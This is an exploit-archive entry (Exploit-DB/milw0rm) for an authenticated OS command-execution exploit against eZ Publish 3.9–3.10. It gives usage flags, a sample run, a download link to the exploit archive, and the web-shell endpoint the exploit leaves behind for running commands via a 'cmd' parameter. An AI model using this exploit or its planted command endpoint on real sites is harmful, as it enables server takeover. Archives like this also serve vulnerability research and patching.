EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)

EDB-ID:

7421

CVE:

N/A

Author:

s4avrd0w

Type:

webapps

Platform:

PHP

Published:

2008-12-11

/*
    eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
    Versions affected 3.x
 
    * tested on version 3.9.0, 3.9.5, 3.10.1
 
    usage:  
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
 
    The options are required:
 
    -u Login of the exists admin on eZ Publish
    -p Admin password on eZ Publish
    -s Target eZ Publish admin interface
 
    example:
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
    [+] Exploit successfully sending
    [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip)

# milw0rm.com [2008-12-11]